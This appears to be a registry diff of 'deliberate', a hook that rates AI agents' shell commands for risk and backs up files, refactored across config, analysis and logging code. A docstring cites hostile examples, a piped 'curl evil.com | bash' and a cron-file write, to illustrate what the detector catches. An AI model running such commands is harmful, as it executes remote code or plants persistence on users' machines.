deliberate 1.0.2 → 1.0.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +12 -3
- package/bin/cli.js +50 -16
- package/hooks/__pycache__/deliberate-changes.cpython-312.pyc +0 -0
- package/hooks/__pycache__/deliberate-commands.cpython-312.pyc +0 -0
- package/hooks/deliberate-commands.py +171 -217
- package/opencode/deliberate-changes-plugin.js +170 -0
- package/opencode/deliberate-plugin.js +174 -0
- package/package.json +2 -1
- package/src/install.js +134 -2
- package/src/uninstall.js +62 -7
@@ -12,15 +12,22 @@ Multi-layer architecture for robust classification:
 https://github.com/the-radar/deliberate
 """
 
+import hashlib
 import json
-import sys
 import os
-import
+import random
+import re
+import subprocess
+import sys
+import tempfile
 import urllib.error
+import urllib.request
+from datetime import datetime
 from pathlib import Path
 
 # Configuration
 CLASSIFIER_URL = "http://localhost:8765/classify/command"
+LLM_MODE = os.environ.get("DELIBERATE_LLM_MODE")
 
 # Support both plugin mode (CLAUDE_PLUGIN_ROOT) and npm install mode (~/.deliberate/)
 # Plugin mode: config in plugin directory
@@ -37,9 +44,6 @@ DEBUG = False
 USE_CLASSIFIER = True  # Try classifier first if available
 
 # Session state for deduplication
-import hashlib
-import random
-from datetime import datetime
 
 
 def get_state_file(session_id: str) -> str:
@@ -156,7 +160,6 @@ def extract_affected_paths(command: str) -> list:
 
     Looks for paths in common destructive commands like rm, mv, cp, git rm, etc.
     """
-    import re
    paths = []
 
    # Patterns for extracting paths from various commands
@@ -222,6 +225,10 @@ def detect_workflow_patterns(history: dict, current_command: str, window_size: i
     return detected
 
 
+RISK_LEVELS = {"LOW": 0, "MODERATE": 1, "HIGH": 2, "CRITICAL": 3}
+RISK_NAMES = {v: k for k, v in RISK_LEVELS.items()}
+
+
 def calculate_cumulative_risk(history: dict, current_risk: str) -> str:
     """Calculate cumulative session risk based on history and current command.
 
@@ -230,36 +237,25 @@ def calculate_cumulative_risk(history: dict, current_risk: str) -> str:
     - Detected workflow patterns
     - Files at risk
     """
-
-
-    # Start with current command's risk
-    max_risk = risk_levels.get(current_risk, 1)
+    max_risk = RISK_LEVELS.get(current_risk, 1)
 
-    # Check historical risks
     dangerous_count = 0
     for cmd in history.get("commands", []):
         cmd_risk = cmd.get("risk", "MODERATE")
         if cmd_risk == "DANGEROUS":
             dangerous_count += 1
-        max_risk = max(max_risk, risk_levels.get(cmd_risk, 1))
+        max_risk = max(max_risk, RISK_LEVELS.get(cmd_risk, 1))
 
-    # Escalate based on dangerous command count
-    if dangerous_count >= 3:
-        max_risk = max(max_risk, risk_levels["HIGH"])
     if dangerous_count >= 5:
-        max_risk = max(max_risk, risk_levels["CRITICAL"])
+        max_risk = max(max_risk, RISK_LEVELS["CRITICAL"])
+    elif dangerous_count >= 3:
+        max_risk = max(max_risk, RISK_LEVELS["HIGH"])
 
-    # Check for detected patterns
     for pattern in history.get("patterns_detected", []):
         pattern_risk = pattern[1] if len(pattern) > 1 else "HIGH"
-        max_risk = max(max_risk, risk_levels.get(pattern_risk, 2))
+        max_risk = max(max_risk, RISK_LEVELS.get(pattern_risk, 2))
 
-
-    for name, level in risk_levels.items():
-        if level == max_risk:
-            return name
-
-    return "MODERATE"
+    return RISK_NAMES.get(max_risk, "MODERATE")
 
 
 def get_destruction_consequences(command: str, cwd: str = ".") -> dict | None:
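For orientation: the hunks above replace a function-local `risk_levels` dict and reverse-lookup loop with module-level `RISK_LEVELS`/`RISK_NAMES` tables, and fold the two count thresholds into an `if`/`elif`. A minimal, runnable sketch of the same escalation logic against a hypothetical session history (the real hook reads this from its per-session state file):

```python
RISK_LEVELS = {"LOW": 0, "MODERATE": 1, "HIGH": 2, "CRITICAL": 3}
RISK_NAMES = {v: k for k, v in RISK_LEVELS.items()}

def cumulative_risk(history: dict, current_risk: str) -> str:
    # Unknown labels default to MODERATE (level 1)
    max_risk = RISK_LEVELS.get(current_risk, 1)
    dangerous = sum(1 for c in history.get("commands", [])
                    if c.get("risk") == "DANGEROUS")
    # Repeated dangerous commands escalate the whole session
    if dangerous >= 5:
        max_risk = max(max_risk, RISK_LEVELS["CRITICAL"])
    elif dangerous >= 3:
        max_risk = max(max_risk, RISK_LEVELS["HIGH"])
    return RISK_NAMES.get(max_risk, "MODERATE")

history = {"commands": [{"risk": "DANGEROUS"}] * 3}  # made-up history
print(cumulative_risk(history, "MODERATE"))  # -> HIGH
```

The `elif` ordering preserves the old outcome (CRITICAL dominates HIGH at five or more dangerous commands) while evaluating only one branch, and `RISK_NAMES.get` replaces the old linear search for the level's name.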
@@ -275,9 +271,6 @@ def get_destruction_consequences(command: str, cwd: str = ".") -> dict | None:
 
     Returns None if command is not destructive or paths don't exist.
     """
-    import re
-    import subprocess
-
     consequences = {
         "files": [],
         "dirs": [],
@@ -382,35 +375,19 @@ def _analyze_path(path: str, consequences: dict):
     try:
         if os.path.isfile(path):
             consequences["files"].append(path)
-            size = os.path.getsize(path)
+            size, lines = _count_file_stats(path)
             consequences["total_size"] += size
-
-            # Count lines for text files
-            if _is_text_file(path):
-                try:
-                    with open(path, 'r', encoding='utf-8', errors='ignore') as f:
-                        lines = sum(1 for _ in f)
-                        consequences["total_lines"] += lines
-                except (IOError, PermissionError):
-                    pass
+            consequences["total_lines"] += lines
 
         elif os.path.isdir(path):
             consequences["dirs"].append(path)
-
-            for root, _dirs, files in os.walk(path):
+            for root, _, files in os.walk(path):
                 for filename in files:
                     filepath = os.path.join(root, filename)
-
-
-
-
-
-                    if _is_text_file(filepath):
-                        with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
-                            lines = sum(1 for _ in f)
-                            consequences["total_lines"] += lines
-                    except (IOError, PermissionError, OSError):
-                        pass
+                    consequences["files"].append(filepath)
+                    size, lines = _count_file_stats(filepath)
+                    consequences["total_size"] += size
+                    consequences["total_lines"] += lines
     except (OSError, PermissionError):
         pass
 
@@ -420,8 +397,6 @@ def _analyze_git_reset_hard(cwd: str, consequences: dict) -> dict | None:
 
     Runs git diff HEAD to see uncommitted changes that will be lost.
     """
-    import subprocess
-
     consequences["type"] = "git_reset_hard"
 
     try:
@@ -453,15 +428,9 @@
             if status[0] in 'MA' or status[1] in 'MA':
                 consequences["files"].append(filepath)
                 if os.path.exists(full_path):
-
-
-
-                    if _is_text_file(full_path):
-                        with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
-                            lines = sum(1 for _ in f)
-                            consequences["total_lines"] += lines
-                    except (IOError, OSError):
-                        pass
+                    size, lines = _count_file_stats(full_path)
+                    consequences["total_size"] += size
+                    consequences["total_lines"] += lines
 
     # Get actual diff to show what changes will be lost
     diff_result = subprocess.run(
@@ -503,8 +472,6 @@ def _analyze_git_clean(cwd: str, consequences: dict) -> dict | None:
 
     Runs git clean -n (dry run) to preview what would be deleted.
     """
-    import subprocess
-
     consequences["type"] = "git_clean"
 
     try:
@@ -523,34 +490,27 @@
 
         # Parse output: "Would remove path/to/file"
         for line in clean_result.stdout.strip().split('\n'):
-            if line.startswith("Would remove "):
-
-                full_path = os.path.join(cwd, filepath)
+            if not line.startswith("Would remove "):
+                continue
 
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-                consequences["total_size"] += os.path.getsize(full_path)
-                if _is_text_file(full_path):
-                    with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
-                        consequences["total_lines"] += sum(1 for _ in f)
-            except (IOError, OSError):
-                pass
+            filepath = line[len("Would remove "):].strip()
+            full_path = os.path.join(cwd, filepath)
+
+            if os.path.isdir(full_path):
+                consequences["dirs"].append(filepath)
+                for root, _, files in os.walk(full_path):
+                    for filename in files:
+                        fpath = os.path.join(root, filename)
+                        consequences["files"].append(fpath)
+                        size, lines = _count_file_stats(fpath)
+                        consequences["total_size"] += size
+                        consequences["total_lines"] += lines
+            else:
+                consequences["files"].append(filepath)
+                if os.path.exists(full_path):
+                    size, lines = _count_file_stats(full_path)
+                    consequences["total_size"] += size
+                    consequences["total_lines"] += lines
 
         if not consequences["files"] and not consequences["dirs"]:
             return None
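The rewritten `git clean` analysis inverts the match (`continue` on anything that isn't a `Would remove ` line) and now walks directories that would be deleted instead of only stat-ing the top-level path. A small sketch of just the parsing step against canned dry-run output, so it runs without a repo; the real code calls `os.path.isdir` on each path, while here a trailing slash stands in so no filesystem is needed:

```python
sample_stdout = """\
Would remove build/
Would remove scratch.txt
hint: some unrelated output line"""

files, dirs = [], []
for line in sample_stdout.strip().split('\n'):
    if not line.startswith("Would remove "):
        continue  # early-continue keeps the happy path unindented
    path = line[len("Would remove "):].strip()
    (dirs if path.endswith('/') else files).append(path)

print(dirs)   # ['build/']
print(files)  # ['scratch.txt']
```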
@@ -583,8 +543,6 @@ def _analyze_git_checkout_discard(cwd: str, consequences: dict) -> dict | None:
 
     Shows modified tracked files that will lose their changes.
     """
-    import subprocess
-
     consequences["type"] = "git_checkout_discard"
 
     try:
@@ -609,13 +567,9 @@
             full_path = os.path.join(cwd, filepath)
 
             if os.path.exists(full_path):
-
-
-
-                    with open(full_path, 'r', encoding='utf-8', errors='ignore') as f:
-                        consequences["total_lines"] += sum(1 for _ in f)
-                except (IOError, OSError):
-                    pass
+                size, lines = _count_file_stats(full_path)
+                consequences["total_size"] += size
+                consequences["total_lines"] += lines
 
         if not consequences["files"]:
             return None
@@ -651,9 +605,6 @@ def _analyze_git_stash_drop(cwd: str, command: str, consequences: dict) -> dict
 
     Shows the content of the stash being dropped.
     """
-    import subprocess
-    import re
-
     consequences["type"] = "git_stash_drop"
 
     try:
@@ -703,20 +654,35 @@
     return None
 
 
+TEXT_EXTENSIONS = {
+    '.py', '.js', '.ts', '.tsx', '.jsx', '.json', '.yaml', '.yml',
+    '.md', '.txt', '.sh', '.bash', '.zsh', '.fish',
+    '.html', '.css', '.scss', '.sass', '.less',
+    '.java', '.kt', '.scala', '.go', '.rs', '.rb', '.php',
+    '.c', '.cpp', '.h', '.hpp', '.cs', '.swift', '.m',
+    '.sql', '.graphql', '.proto', '.xml', '.toml', '.ini', '.cfg',
+    '.env', '.gitignore', '.dockerignore', 'Makefile', 'Dockerfile',
+    '.vue', '.svelte', '.astro'
+}
+
+
 def _is_text_file(path: str) -> bool:
     """Check if file is likely a text/code file based on extension."""
-    text_extensions = {
-        '.py', '.js', '.ts', '.tsx', '.jsx', '.json', '.yaml', '.yml',
-        '.md', '.txt', '.sh', '.bash', '.zsh', '.fish',
-        '.html', '.css', '.scss', '.sass', '.less',
-        '.java', '.kt', '.scala', '.go', '.rs', '.rb', '.php',
-        '.c', '.cpp', '.h', '.hpp', '.cs', '.swift', '.m',
-        '.sql', '.graphql', '.proto', '.xml', '.toml', '.ini', '.cfg',
-        '.env', '.gitignore', '.dockerignore', 'Makefile', 'Dockerfile',
-        '.vue', '.svelte', '.astro'
-    }
     _, ext = os.path.splitext(path)
-    return ext.lower() in text_extensions
+    return ext.lower() in TEXT_EXTENSIONS or os.path.basename(path) in TEXT_EXTENSIONS
+
+
+def _count_file_stats(filepath: str) -> tuple[int, int]:
+    """Count size and lines for a file. Returns (size_bytes, line_count)."""
+    try:
+        size = os.path.getsize(filepath)
+        lines = 0
+        if _is_text_file(filepath):
+            with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
+                lines = sum(1 for _ in f)
+        return size, lines
+    except (IOError, PermissionError, OSError):
+        return 0, 0
 
 
 def get_backup_dir() -> str:
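Hoisting the extension set to module level and adding `_count_file_stats` removes four near-identical open/count blocks from the analyzers above. Note the new basename check: entries like `Makefile` and `Dockerfile` have no extension, so the old `ext.lower() in text_extensions` test could never match them. A self-contained usage sketch with an abbreviated extension set:

```python
import os
import tempfile

TEXT_EXTENSIONS = {'.py', '.txt', '.md', 'Makefile'}  # abbreviated for the sketch

def _is_text_file(path: str) -> bool:
    _, ext = os.path.splitext(path)
    return ext.lower() in TEXT_EXTENSIONS or os.path.basename(path) in TEXT_EXTENSIONS

def _count_file_stats(filepath: str) -> tuple[int, int]:
    """Return (size_bytes, line_count); (0, 0) on any I/O failure."""
    try:
        size = os.path.getsize(filepath)
        lines = 0
        if _is_text_file(filepath):
            with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                lines = sum(1 for _ in f)
        return size, lines
    except (IOError, PermissionError, OSError):
        return 0, 0

with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as tmp:
    tmp.write("one\ntwo\nthree\n")
    path = tmp.name
print(_count_file_stats(path))  # (14, 3)
os.unlink(path)
```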
@@ -741,7 +707,6 @@ def create_pre_destruction_backup(
     Returns backup path if successful, None if backup failed/skipped.
     """
     import shutil
-    import subprocess
 
     backup_base = get_backup_dir()
     timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
@@ -856,20 +821,12 @@
 
 def load_backup_config() -> dict:
     """Load backup configuration from config file."""
-
-
-
-
-
-
-            return {
-                "enabled": backup.get("enabled", True),  # Enabled by default
-                "maxBackups": backup.get("maxBackups", 50),
-                "riskThreshold": backup.get("riskThreshold", "CRITICAL")  # Only backup for CRITICAL by default
-            }
-    except Exception:
-        pass
-    return {"enabled": True, "maxBackups": 50, "riskThreshold": "CRITICAL"}
+    backup = _load_config().get("backup", {})
+    return {
+        "enabled": backup.get("enabled", True),
+        "maxBackups": backup.get("maxBackups", 50),
+        "riskThreshold": backup.get("riskThreshold", "CRITICAL")
+    }
 
 
 def add_command_to_history(session_id: str, command: str, risk: str, explanation: str):
@@ -949,34 +906,38 @@ def save_to_cache(session_id: str, cmd_hash: str, data: dict):
         debug(f"Failed to cache: {e}")
 
 
-
-
+_config_cache = None
+
+
+def _load_config() -> dict:
+    """Load config from CONFIG_FILE with simple caching."""
+    global _config_cache
+    if _config_cache is not None:
+        return _config_cache
     try:
         config_path = Path(CONFIG_FILE)
         if config_path.exists():
             with open(config_path, 'r', encoding='utf-8') as f:
-
-
-            return {
-                "enabled": blocking.get("enabled", False),
-                "confidenceThreshold": blocking.get("confidenceThreshold", 0.85)
-            }
+                _config_cache = json.load(f)
+                return _config_cache
     except Exception:
         pass
-
+    _config_cache = {}
+    return _config_cache
+
+
+def load_blocking_config() -> dict:
+    """Load blocking configuration from config file."""
+    blocking = _load_config().get("blocking", {})
+    return {
+        "enabled": blocking.get("enabled", False),
+        "confidenceThreshold": blocking.get("confidenceThreshold", 0.85)
+    }
 
 
 def load_dedup_config() -> bool:
     """Load deduplication config - returns True if dedup is enabled (default)."""
-
-    config_path = Path(CONFIG_FILE)
-    if config_path.exists():
-        with open(config_path, 'r', encoding='utf-8') as f:
-            config = json.load(f)
-            return config.get("deduplication", {}).get("enabled", True)
-    except Exception:
-        pass
-    return True
+    return _load_config().get("deduplication", {}).get("enabled", True)
 
 
 # Default trivial commands that are TRULY safe - no abuse potential
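All of the `load_*_config` helpers previously re-opened and re-parsed `CONFIG_FILE`; they now read through one memoized `_load_config()`, and a parse failure caches `{}` so the defaults apply consistently. Pieced together from the keys the helpers query, a config along these lines would exercise every branch — a hedged reconstruction from this diff, not the package's documented schema:

```python
# Keys observed in this diff; the values shown are the defaults the
# helpers fall back to, plus illustrative skipCommands entries.
example_config = {
    "blocking": {"enabled": False, "confidenceThreshold": 0.85},
    "backup": {"enabled": True, "maxBackups": 50, "riskThreshold": "CRITICAL"},
    "deduplication": {"enabled": True},
    "skipCommands": {"additional": ["make lint"], "remove": ["cat"]},
    "llm": {"provider": "claude-subscription", "baseUrl": None,
            "apiKey": None, "model": None},
}
```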
@@ -1014,24 +975,14 @@ DANGEROUS_SHELL_OPERATORS = {
 def load_skip_commands() -> set:
     """Load skip commands list from config, with defaults."""
     skip_set = DEFAULT_SKIP_COMMANDS.copy()
-
-
-
-
-
-
-
-
-        custom_skip = skip_config.get("additional", [])
-        for cmd in custom_skip:
-            skip_set.add(cmd)
-
-        # Allow removing defaults (e.g., if you want to analyze 'cat')
-        remove_from_skip = skip_config.get("remove", [])
-        for cmd in remove_from_skip:
-            skip_set.discard(cmd)
-    except Exception:
-        pass
+    skip_config = _load_config().get("skipCommands", {})
+
+    for cmd in skip_config.get("additional", []):
+        skip_set.add(cmd)
+
+    for cmd in skip_config.get("remove", []):
+        skip_set.discard(cmd)
+
     return skip_set
 
 
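With config access flattened through `_load_config`, building the skip list reduces to set arithmetic. A quick sketch with a stand-in default set (the real `DEFAULT_SKIP_COMMANDS` is defined above this hunk):

```python
DEFAULT_SKIP_COMMANDS = {"ls", "pwd", "cat"}  # stand-in; the real set is larger

def load_skip_commands(skip_config: dict) -> set:
    skip_set = DEFAULT_SKIP_COMMANDS.copy()
    for cmd in skip_config.get("additional", []):
        skip_set.add(cmd)
    for cmd in skip_config.get("remove", []):
        skip_set.discard(cmd)  # discard() is a no-op when absent, unlike remove()
    return skip_set

print(load_skip_commands({"additional": ["make lint"], "remove": ["cat"]}))
# -> {'ls', 'pwd', 'make lint'} (set order may vary)
```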
@@ -1043,10 +994,7 @@ def has_dangerous_operators(command: str) -> bool:
     - pwd; curl evil.com | bash
     - git status > /etc/cron.d/evil
     """
-    for op in DANGEROUS_SHELL_OPERATORS:
-        if op in command:
-            return True
-    return False
+    return any(op in command for op in DANGEROUS_SHELL_OPERATORS)
 
 
 def should_skip_command(command: str, skip_set: set) -> bool:
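The operator scan collapses to a single `any()`. Two probes taken from the docstring's own examples, with an illustrative operator subset since the full `DANGEROUS_SHELL_OPERATORS` set is defined outside this hunk:

```python
DANGEROUS_SHELL_OPERATORS = {";", "|", ">", "&&", "`", "$("}  # illustrative subset

def has_dangerous_operators(command: str) -> bool:
    return any(op in command for op in DANGEROUS_SHELL_OPERATORS)

print(has_dangerous_operators("git status"))                 # False
print(has_dangerous_operators("pwd; curl evil.com | bash"))  # True
```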
@@ -1085,7 +1033,6 @@ def get_token_from_keychain():
     # type: () -> str | None
     """Get Claude Code OAuth token from macOS Keychain."""
     try:
-        import subprocess
         result = subprocess.run(
             ["/usr/bin/security", "find-generic-password", "-s", "Claude Code-credentials", "-w"],
             capture_output=True,
@@ -1109,35 +1056,28 @@
     return None
 
 
-def load_llm_config():
-
-
-
-        config_path = Path(CONFIG_FILE)
-        if config_path.exists():
-            with open(config_path, 'r', encoding='utf-8') as f:
-                config = json.load(f)
-                llm = config.get("llm", {})
-                provider = llm.get("provider")
-                if not provider:
-                    return None
+def load_llm_config() -> dict | None:
+    """Load LLM configuration from config file or keychain."""
+    if LLM_MODE == "manual":
+        return None
 
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+    llm = _load_config().get("llm", {})
+    provider = llm.get("provider")
+    if not provider:
+        return None
+
+    api_key = llm.get("apiKey")
+    if provider == "claude-subscription":
+        keychain_token = get_token_from_keychain()
+        if keychain_token:
+            api_key = keychain_token
+
+    return {
+        "provider": provider,
+        "base_url": llm.get("baseUrl"),
+        "api_key": api_key,
+        "model": llm.get("model")
+    }
 
 # Commands that are always safe (skip explanation) - fallback if classifier unavailable
 SAFE_PREFIXES = [
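`load_llm_config` gains two behaviors: the `DELIBERATE_LLM_MODE=manual` environment kill-switch short-circuits everything, and for the `claude-subscription` provider a Keychain token takes precedence over any `apiKey` in the config. A sketch of that resolution order with the Keychain lookup passed in as a plain value (a hypothetical wrapper for illustration, not the hook's actual signature):

```python
def resolve_llm_config(llm: dict, llm_mode: str | None,
                       keychain_token: str | None) -> dict | None:
    if llm_mode == "manual":          # env kill-switch wins outright
        return None
    provider = llm.get("provider")
    if not provider:                  # no provider configured -> no LLM
        return None
    api_key = llm.get("apiKey")
    if provider == "claude-subscription" and keychain_token:
        api_key = keychain_token      # Keychain beats the config file
    return {"provider": provider, "base_url": llm.get("baseUrl"),
            "api_key": api_key, "model": llm.get("model")}

cfg = {"provider": "claude-subscription", "apiKey": "from-config"}
print(resolve_llm_config(cfg, None, "from-keychain")["api_key"])  # from-keychain
print(resolve_llm_config(cfg, "manual", "from-keychain"))         # None
```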
@@ -1177,19 +1117,13 @@ def debug(msg):
 def is_safe_command(command: str) -> bool:
     """Check if command is in the safe list (fallback)."""
     cmd_lower = command.strip().lower()
-    for prefix in SAFE_PREFIXES:
-        if cmd_lower.startswith(prefix.lower()):
-            return True
-    return False
+    return any(cmd_lower.startswith(prefix.lower()) for prefix in SAFE_PREFIXES)
 
 
 def is_dangerous_command(command: str) -> bool:
     """Check if command matches dangerous patterns (fallback)."""
     cmd_lower = command.lower()
-    for pattern in DANGEROUS_PATTERNS:
-        if pattern.lower() in cmd_lower:
-            return True
-    return False
+    return any(pattern.lower() in cmd_lower for pattern in DANGEROUS_PATTERNS)
 
 
 def call_classifier(command: str) -> dict | None:
@@ -1230,8 +1164,6 @@ def extract_script_content(command: str) -> str | None:
     - source script.sh
     - python script.py
     """
-    import re
-
     # Common script execution patterns
     patterns = [
         # bash/sh/zsh execution
@@ -1279,8 +1211,6 @@ def extract_inline_content(command: str) -> str | None:
 
     Returns the inline content if found, None otherwise.
     """
-    import re
-
     # Heredoc patterns - capture content between << MARKER and MARKER
     # Handles both << EOF and << 'EOF' (quoted prevents variable expansion)
     heredoc_pattern = r'<<\s*[\'"]?(\w+)[\'"]?\s*\n(.*?)\n\1'
@@ -1334,6 +1264,7 @@ def extract_inline_content(command: str) -> str | None:
 
 def call_llm_for_explanation(command: str, pre_classification: dict | None = None, script_content: str | None = None) -> dict | None:
     """Call the configured LLM to explain the command using Claude Agent SDK."""
+    debug("call_llm_for_explanation started")
 
     llm_config = load_llm_config()
     if not llm_config:
@@ -1341,6 +1272,7 @@ def call_llm_for_explanation(command: str, pre_classification: dict | None = Non
         return None
 
     provider = llm_config["provider"]
+    debug(f"LLM provider: {provider}")
 
     # Only use SDK for claude-subscription provider
     if provider != "claude-subscription":
@@ -1395,10 +1327,6 @@ RISK: [SAFE|MODERATE|DANGEROUS]
 EXPLANATION: [your explanation including any security notes]"""
 
     try:
-        # Use Claude Agent SDK
-        import subprocess
-        import tempfile
-
         # Create temp file for SDK script
         with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
             sdk_script = f"""
@@ -1428,15 +1356,30 @@ async def main():
     async with client:
         await client.query(prompt)
 
-        # Collect response
+        # Collect response - check both AssistantMessage and ResultMessage
         response_text = ""
         async for msg in client.receive_response():
             msg_type = type(msg).__name__
-
-
+
+            # Try to get text from AssistantMessage
+            if msg_type == 'AssistantMessage' and hasattr(msg, 'content'):
+                # content is a list of blocks (TextBlock, ToolUseBlock, etc.)
+                for block in (msg.content or []):
+                    block_type = type(block).__name__
+                    if block_type == 'TextBlock' and hasattr(block, 'text') and block.text:
+                        # Accumulate text from all TextBlocks
+                        if response_text:
+                            response_text += "\\n" + block.text
+                        else:
+                            response_text = block.text
+
+            # ResultMessage marks the end
+            if msg_type == 'ResultMessage':
+                if hasattr(msg, 'result') and msg.result:
+                    response_text = msg.result
                 break
 
-        print(response_text)
+        print(response_text if response_text else "")
 
 # Run async main
 asyncio.run(main())
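The generated SDK script matches messages by `type(msg).__name__` and `hasattr` rather than importing SDK classes, so it degrades gracefully if message shapes shift. The same accumulation logic can be exercised with stand-in classes — hypothetical stubs modeling only the attributes the collector touches, not the real claude-agent-sdk types:

```python
from dataclasses import dataclass

@dataclass
class TextBlock:          # stub: the real SDK block has more fields
    text: str

@dataclass
class AssistantMessage:   # stub
    content: list

@dataclass
class ResultMessage:      # stub; result may be None
    result: str | None

def collect(messages) -> str:
    response_text = ""
    for msg in messages:
        msg_type = type(msg).__name__
        if msg_type == 'AssistantMessage' and hasattr(msg, 'content'):
            for block in (msg.content or []):
                if type(block).__name__ == 'TextBlock' and getattr(block, 'text', None):
                    response_text = (response_text + "\n" + block.text
                                     if response_text else block.text)
        if msg_type == 'ResultMessage':
            if getattr(msg, 'result', None):
                response_text = msg.result  # a final result, when present, wins
            break
    return response_text

msgs = [AssistantMessage([TextBlock("RISK: MODERATE")]), ResultMessage(None)]
print(collect(msgs))  # RISK: MODERATE
```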
@@ -1445,6 +1388,7 @@ asyncio.run(main())
         script_path = f.name
 
         # Run SDK script
+        debug("Running SDK script...")
         result = subprocess.run(
             ["python3", script_path],
             capture_output=True,
@@ -1454,11 +1398,14 @@
 
         os.unlink(script_path)
 
+        debug(f"SDK returncode: {result.returncode}")
+        debug(f"SDK stderr: {result.stderr[:500] if result.stderr else 'none'}")
         if result.returncode != 0:
             debug(f"SDK script failed: {result.stderr}")
             return None
 
         content = result.stdout.strip()
+        debug(f"SDK stdout (first 200 chars): {content[:200]}")
 
         # Parse the response
         risk = "MODERATE"
@@ -1602,6 +1549,13 @@ def main():
         risk = llm_result["risk"]
         explanation = llm_result["explanation"]
 
+    # Guard against None/empty explanation - fall back to classifier reason or generic message
+    if not explanation or explanation == "None":
+        if classifier_result and classifier_result.get("reason"):
+            explanation = classifier_result.get("reason")
+        else:
+            explanation = "Review command before proceeding"
+
     # NOTE: Deduplication is handled AFTER block/allow decision
     # We moved it below to prevent blocked commands from being allowed on retry
 
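One subtlety in the guard: it checks for the literal string "None" as well as falsy values, since a `None` explanation that was string-formatted upstream arrives as `"None"`. The fallback chain in isolation:

```python
def safe_explanation(explanation, classifier_result) -> str:
    if not explanation or explanation == "None":
        if classifier_result and classifier_result.get("reason"):
            return classifier_result["reason"]
        return "Review command before proceeding"
    return explanation

print(safe_explanation("None", {"reason": "rewrites git history"}))
# -> rewrites git history
print(safe_explanation(None, None))
# -> Review command before proceeding
```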